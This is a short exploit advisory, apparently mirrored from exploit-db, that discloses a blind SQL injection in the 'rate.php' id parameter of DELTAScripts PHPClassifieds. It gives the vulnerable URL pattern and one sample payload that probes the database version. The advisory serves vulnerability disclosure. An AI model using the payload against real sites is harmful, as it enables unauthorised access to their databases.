DELTAScripts PHPClassifieds – ‘rate.php’ Blind SQL Injection

  • 作者: Hamza 'MizoZ' N.
    日期: 2010-01-08
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11071/
  • /*
    
    Name : DELTAScripts PHPClassifieds
    Vuln : Blind SQL Injection
    
    Author : Hamza 'MizoZ' N.
    Email : mizozx[at]gmail[dot]com
    WebSite : www.greymen.org<http://www.greymen.org>
    
    Greetz : Zuka, all friends & arab hackers
    
    */
    
    Vulnerability is in the rate.php , $_GET['id']
    
    [HOST]/[PATH]/rate.php?id=[true value]+[INJECTION]
    
    exemples :
    http://server/rate.php?id=405+and+%28select%20version%28%29%29=5--